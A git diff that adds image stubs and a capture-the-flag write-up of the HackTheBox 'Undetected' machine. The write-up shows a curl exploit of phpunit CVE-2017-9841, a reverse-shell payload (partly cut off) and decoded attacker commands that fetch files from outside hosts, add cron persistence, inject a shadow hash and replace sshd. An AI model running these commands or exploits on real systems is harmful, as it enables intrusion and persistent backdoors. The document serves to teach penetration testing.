sha256:bb90f770285d83178892a15333d06dec50497fb7ff360d8c6d14e8f799b4b60f +size 27888 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.png b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png new file mode 100644 index 0000000..4fd9e88 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f2c89f7864ee1b755081af7b4a2f8fe106f7197cf6d40a22634b45df44e1abda +size 37947 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp new file mode 100644 index 0000000..11280e1 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c328baed7dfb5f86667a89115e1bd16b48a7abffe4a8bc10b9b90058a511714d +size 29180 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.png b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png new file mode 100644 index 0000000..fbc6905 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a8b979d0d2f85f4c32dd0a091121493298d2bb28257aff3b3e275efbbf8127b2 +size 22346 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp new file mode 100644 index 0000000..945eae3 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:548450b30532e9752b664b1d6209adfbcc801a6ed9ce9cd414d9108cd9cb69bc +size 26692 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.png b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png new file mode 100644 index 0000000..03db2e7 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6226d76132fb29431c5fdd1f5dfbb163b9fce05354cecd2e302af401f2fbeba9 +size 13513 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp new file mode 100644 index 0000000..8d1cd87 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:c1b9ec7a173c6d3273e35489a980c3c6ec358ee8d4f1c1631779c220b8955760 +size 11912 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.png b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png new file mode 100644 index 0000000..d897dbc --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b93994f5e30ea46d8804ce18490231b82c78de984e92f75170aa3f08a42367f8 +size 707863 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp new file mode 100644 index 0000000..c1d8d33 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:41a2aaeac7ad2a554f7f515e0a35910f095acb1b11cb9a4672d60b10f05c9029 +size 105252 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.png b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png new file mode 100644 index 0000000..c26d727 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:0961533532df1b04d212a67bd8f489be432593fa3344a45994f88a495c1fd1c9 +size 771609 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp new file mode 100644 index 0000000..ee23a58 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:54b6b7557b35d89a18add7ce3cb5570b2ff50bc216be74f982a6b43cd828a2f9 +size 106284 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.png b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png new file mode 100644 index 0000000..288f6ac --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3535bc6774dd9bf2ca87c615e51580877ccb2ffad2d112e889ab46389fe64beb +size 75824 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp new file mode 100644 index 0000000..06f9200 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:609e1804a698b4f0e0dcfaa1f88cf0a469c160d99cf0c9e309c6162a418f3133 +size 49038 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.png b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png new file mode 100644 index 0000000..929c13e --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f987b24c95e5109468a2c61bb1f373658d022955123ecf8ecde3cc1c9ecfd2df +size 149920 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp new file mode 100644 index 0000000..594e0bc --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e586edba87e5e2b5dd87dc73f27a98d551e9685f87eb33fce6cf54df9490eb5 +size 126184 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.png b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png new file mode 100644 index 0000000..aebb481 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a7142b295523f882a236fbb896532359671f34a92d37b2693a36eedfb62e9ade +size 40215 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp new file mode 100644 index 0000000..be4bbe3 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:9badc803bc9351be412793bdd6d96832ac837fc3f3ea572afac5805d08eea94c +size 28898 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.png b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png new file mode 100644 index 0000000..36df5f5 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b62c34975df94f96e19b23fb29574a68ff5df6098011afcf3f34f192b6ea115a +size 55703 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp new file mode 100644 index 0000000..59643b7 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:50aafb992cad3a47977f76f3d4c6781a5b9777b5d3d7769e7f1442bc5d35f865 +size 37728 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.png b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png new file mode 100644 index 0000000..157c037 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:796988e9b8d51806a19bc8026e7d84b831d8cc82ae1cec6c6b444c95d8db9974 +size 72422 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp new file mode 100644 index 0000000..79241f6 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-8.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:68d4056659c848c8ecbf3d1c1774d47ba09830c2eac377ca0350359175e47f20 +size 51648 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.png b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png new file mode 100644 index 0000000..d9c2a5d --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:808015e3d80a2b00eebaf29e4de90c8eab94ddbdbe1dcefca72898e188bb7fd3 +size 25832 diff --git a/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp new file mode 100644 index 0000000..6c6209c --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/img/image-9.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d82211f286103e07893d119c16e8f36aaf3fb70231ce31db982eb48d3f8e2b6a +size 22102 diff --git a/content/writeup-ctf/writeup-undetected-htb/index.md b/content/writeup-ctf/writeup-undetected-htb/index.md new file mode 100644 index 0000000..e443b34 --- /dev/null +++ b/content/writeup-ctf/writeup-undetected-htb/index.md @@ -0,0 +1,167 @@ +--- +title: "Writeup - Undetected (HTB)" +date: 2022-04-09 +slug: "writeup-undetected-htb" +type: "writeup-ctf" +--- + +This is a writeup for the [Undectected](https://app.hackthebox.com/machines/Undetected) machine from  the HackTheBox site. + +## Enumeration + +First, let's start with a scan of our target with the following command: + + +```bash +nmap -sV 10.10.11.146 +``` +Two TCP ports are discovered: + +![](img/image-1.webp) + +- 22/tcp : SSH port (OpenSSH 8.2) +- 80/tcp : HTTP web server (Apache 2.4.41) + +![](img/image-2.webp) + +## Exploit + +While going on the site I notice that there is a subdomain, so I add it in the /etc/hosts file: + + +```bash +10.10.11.146 store.djewelry.htb +``` +![](img/image-3.webp) + +I arrive on a new part of the site : the store. I start by searching for a folder with gobuster : + + +```bash +gobuster dir -u http://store.djewelry.htb -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt +``` +I quickly find the "/vendor" folder: + +![](img/image-4.webp) + +A lot of potential exploit... After some research I find that this version of "phpunit" has an exploit allowing to execute remote commands via PHP ([CVE-2017-9841](https://gist.github.com/yassineaboukir/1501de6f60dce148824d3001e83fb263)). + + +```bash +┌──(kali㉿kali)-[~] +└─$ curl --data "" http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php +uid=33(www-data) gid=33(www-data) groups=33(www-data) +``` +So I will be able to use this exploit to create a reverse shell. To do this I open a port with "nc", then I use the following command to start the session: + + +```bash +curl --data '$sock, 1=>$sock, 2=>$sock),$pipes); ?>' http://store.djewelry.htb/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php + +``` +I now have a reverse shell. I'll do a first scan with [linPeas](lingeas.sh). After some analysis, I find a suspicious file in the "/var/backups" folder. After retrieving the file on my PC, I extract the information with the "strings" command. + +In the result of the command I find a large hexadecimal character string that I decipher with the site [Hex decode](https://www.convertstring.com/EncodeDecode/HexDecode). + +![](img/image-5.webp) + +It is a sequence of commands: + + +```bash +wget tempfiles.xyz/authorized_keys -O /root/.ssh/authorized_keys; +wget tempfiles.xyz/.main -O /var/lib/.main; +chmod 755 /var/lib/.main; +echo "* 3 * * * root /var/lib/.main" >> /etc/crontab; awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1"1:\$6\$zS7ykHfFMg3aYht4\$1IUrhZanRuDZhf1oIdnoOvXoolKmlwbkegBXk.VtGg78eL7WBM6OrNtGbZxKBtPu8Ufm9hM0R/BLdACoQ0T9n/:18813:0:99999:7::: >> /etc/shadow")}' /etc/passwd; +awk -F":" '$7 == "/bin/bash" && $3 >= 1000 {system("echo "$1" "$3" "$6" "$7" > users.txt")}' /etc/passwd; while read -r user group home shell _; +do echo "$user"1":x:$group:$group:,,,:$home:$shell" >> /etc/passwd; done < users.txt; rm users.txt; +``` +One element is of particular interest to us, the hash of a user's password. I retrieve it and try to crack it with "john". + +![](img/image-6.webp) + +After a few seconds john finds the password: ihatehackers. + +We don't have the user name, but during the linPeas scan, I found that there were 2 users besides root: steven & steven1. + +Let's try with the two users: + +![](img/image-7.webp) + +So this is the password of steven1! I now have access to the first flag of the machine. + +## Privilege escalation + +Let's go back to our LinPeas scan. I noticed that the user steven had a mail in the folder "/var/mail" : + +![](img/image-8.webp) + +Globally the sysadmin tells us that there is a problem with apache, let's go and see in the apache folder if we notice any unusual elements. + +In the molules folder, there are a lot of elements, but when I look at the modification dates, I notice that they have the same date except one : mod\_reader.so. + + +```bash +ls -l /usr/lib/apache/modules +``` +![](img/image-9.webp) + +I get the file on my computer and get the information with the command "strings". And as usual there is a big string, but this time in base64. I decrypt it with the following command : + + +```bash +┌──(kali㉿kali)-[~/Downloads] +└─$ echo "d2dldCBzaGFyZWZpbGVzLnh5ei9pbWFnZS5qcGVnIC1PIC91c3Ivc2Jpbi9zc2hkOyB0b3VjaCAtZCBgZGF0ZSArJVktJW0tJWQgLXIgL3Vzci9zYmluL2EyZW5tb2RgIC91c3Ivc2Jpbi9zc2hk" | base64 -d +wget sharefiles.xyz/image.jpeg -O /usr/sbin/sshd; touch -d `date +%Y-%m-%d -r /usr/sbin/a2enmod` /usr/sbin/sshd +``` +These are 2 commands that use the program "sshd", so I get the ssdh file for analysis with ghidra. + +After the analysis of ghidra, I look if there are not unusual variables or functions. And I find a function that attracts my attention: auth\_password. + +In this function I find the backdoor's signature and a sequence of hexadecimal characters composing a password. Let's try to recompose the password! + +![](img/image-10.webp) + +At first I put back in order the password bits. I notice that the first byte is negative, but when I right click on the value, ghidra tells me that it corresponds to "0xa5". + + +```bash +30_1 0xa5 +28_2 0xa9f4 +24_4 0xbcf0b5e3 +16_8 0xb2d6f4a0fda0b3d6 +12_4 0xfdb3d6e7 +8_4 0xf7bbfdc8 +4_4 0xa4b3a3f3 +0_4 0xf0e7abd6 +``` + In total, I find that it corresponds to 31 bytes, it's a good sign it's the size of the "backdoor" variable! + +I notice that at the end of the processing the following calculation is done: "\*pbVar4 = bVar7 ^ 0x96". This corresponds to an XOR with the value 96. + +I have all the elements, so I should be able to find the password with the help of [CyberChef](https://gchq.github.io/CyberChef). I add the following modules: + +- Swap endianness -> 31 word length +- From Hex +- XOR -> key : 96 + +{{< alert icon="circle-info" >}} +The "Swap endianness" function allows to convert little endian and big endian (or vice versa). These are two possibilities to store information.At the end cyberchef returns the following string: +{{< /alert >}} + +```bash +@=qfe5%2^k-aq@%k@%6k6b@$u#f*b?3 +``` +Let's try to connect to root with this password: + +![](img/image-11.webp) + +And it works, so I can get the last flag. + +## Recommendations + +To patch this host I think it would be necessary to perform a number of actions: + +- Mettre a jour phpunit pour la dernière version +- Do not leave files with hashes visible to everyone / use stronger passwords +- Use key authentication for ssh root connection diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.png b/content/writeup-ctf/writeup-unicode-htb/featured.png new file mode 100644 index 0000000..8efb15a --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/featured.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1424deefc3bd5a9009ecb5bc81aea80fe2d4c22d4b8733dc09a5461375a6a664 +size 263343 diff --git a/content/writeup-ctf/writeup-unicode-htb/featured.webp b/content/writeup-ctf/writeup-unicode-htb/featured.webp new file mode 100644 index 0000000..5dc5c0f --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/featured.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ca991bf1154421894698236d46037e0fde2983ce131f7dd695acebe1cda306aa +size 26162 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.png b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png new file mode 100644 index 0000000..3fdd68d --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b13cc401f297db1292816f1ee790ed7490daf2bd1d0860e0b9dfece950f0a251 +size 35330 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp new file mode 100644 index 0000000..c4feca0 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-1.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:3e798a235addfd1b574b46baafa279c7ae599ad243d54df0f2f089bb2129f5b3 +size 33810 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.png b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png new file mode 100644 index 0000000..2cda667 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:316870d53eab1c429a6483822119761aefd0c097996615147dbd2a3ebbbccd8a +size 135430 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp new file mode 100644 index 0000000..a801d49 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-10.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:7f65102bfaaf059e3cf21efb9461748221431f51c25e7ed30bccb7a8e0b974db +size 107204 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.png b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png new file mode 100644 index 0000000..62a895d --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:503b7cbd2e7330b1b85deebaa72e4875841da6b88439b0489ca651044643bd35 +size 98261 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp new file mode 100644 index 0000000..bbbb292 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-11.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:a787f6525e92debcedcc5448cf323be5fe0598866820429f0a356a140feef8bd +size 47326 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.png b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png new file mode 100644 index 0000000..31bf304 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:79f87fceac5cd639928f5e75ffa5588c74c3d5ba5d3d1c70b68b38fff9aef0e4 +size 67086 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp new file mode 100644 index 0000000..8a32ed4 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-12.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:269b68043e8e00df762c13d267d86986dbcf041284cc25d6d440f6922f991e11 +size 83128 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.png b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png new file mode 100644 index 0000000..b6734ae --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d785161f7afa040a36a3892661c4280d6a44d2c2af1aec5ffb968f730af11490 +size 13953 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp new file mode 100644 index 0000000..a7268d7 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-13.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:ade238fb0e2da475cb4208fd7416de4104344cc4b99a3eb0a731d1a1e8ffdb79 +size 16720 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.png b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png new file mode 100644 index 0000000..fbcdd39 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:4acd80930d98b07e04b0b56784fa9749dbbf0ba4c9b77707851a34f5d9d1c1a7 +size 32401 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp new file mode 100644 index 0000000..7727282 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-14.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:42eec09f9d8c38879986a1b3b5e5ed8108ca59f9756a45133beb1a0c90f49e6a +size 30716 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.png b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png new file mode 100644 index 0000000..395a0c0 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:1a2558b2eb5f6c7dfce8c053a44347cbee78700b0e48a099904daa842b287e04 +size 10139 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp new file mode 100644 index 0000000..6467a50 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-15.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:110cd0b17edc1d7602c1b98feab040dac79b1d83f743d31aa879f7e426c7add8 +size 11012 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.png b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png new file mode 100644 index 0000000..0004754 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e873cf88988cd26bb853ddd493a140bedfc3d27584fad2cc47ba5bafff2da729 +size 46992 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp new file mode 100644 index 0000000..e503d18 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-16.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:b0cf756d4794ed6c556d1f35af8414290055a305ec27dc86d4d62b1aedf1ba5c +size 67160 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.png b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png new file mode 100644 index 0000000..819a6cd --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:55a5493a3d30da7ec55c1773bd95ebec52c0c143b73334c43576cd68056bb2e1 +size 22349 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp new file mode 100644 index 0000000..f7c77c8 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-17.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:cdb91355291c96759130d44558ddaa6ceaa6cd18b6a49c81f98d0ef85b6f1c2a +size 34580 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.png b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png new file mode 100644 index 0000000..6402cdb --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:27fdd71979f347374b853d1f2fdde8c7471ca7682b6008aec987696173f3c676 +size 105639 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp new file mode 100644 index 0000000..67380ca --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-2.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:947f486482d5adeddfe69866b87a536253921760c18067a56379f8da1eb31e92 +size 18530 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.png b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png new file mode 100644 index 0000000..4c4f05e --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:70b725e86365fb7749186d4da8ed8be2cf1a5fedb472894d985e879f6d1599bc +size 46676 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp new file mode 100644 index 0000000..56f2a10 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-3.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5b630a6cb9da2408661d9fbe313f31bb87c0387587c63181185b79c6f3bfc93f +size 13884 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.png b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png new file mode 100644 index 0000000..56b9698 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:f0095690937b8a93eb85b010030039505185fd63b9cd85926a7d92234effcfcc +size 139343 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp new file mode 100644 index 0000000..8777883 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-4.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:34dff53eb88d134ede9bb059379c294dba27770c049b4c4065eba4d0ba329a0d +size 60650 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.png b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png new file mode 100644 index 0000000..44698cb --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:e47405783afbe203ef272aedc5a8492cae640b077d380a728c30a29392f23fdf +size 42414 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp new file mode 100644 index 0000000..9f7bd3e --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-5.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:073d4e30b98e53f70eec7320002834be78f6509868427b5e08eb034bb9ebb2d7 +size 15022 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.png b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png new file mode 100644 index 0000000..275b8a2 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:d7de92b0a59ba688c0c5fd2e803e09403f6d49a3e0f49970448ac1e95d12dea7 +size 2830 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp new file mode 100644 index 0000000..5f80472 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-6.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:5e95a319a4ce81a430f4afdba3143e18c68b737b898cba5eba4a20cdd529abe2 +size 2064 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.png b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png new file mode 100644 index 0000000..634d5b6 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:6b9bd0096ac96e7b35323194368a0b53e1aaa562f42b7a645226380ba4518884 +size 117685 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp new file mode 100644 index 0000000..de75f51 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-7.webp @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:dca94e3abf286ab940a31dd9e3c0cd4839e4ffa2f7610520c8331f985d0ecb56 +size 92474 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.png b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png new file mode 100644 index 0000000..1739068 --- /dev/null +++ b/content/writeup-ctf/writeup-unicode-htb/img/image-8.png @@ -0,0 +1,3 @@ +version https://git-lfs.github.com/spec/v1 +oid sha256:88e61709c2642b5ea5f29aba65ece391ff71ae4870e06e2443907dfa8114e186 +size 24417 diff --git a/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp b/content/writeup-ctf/writeup-unicode-htb/img/image-8.webp new file mode 100644 index 0000000..a9e6cfd --- /dev/null +++ 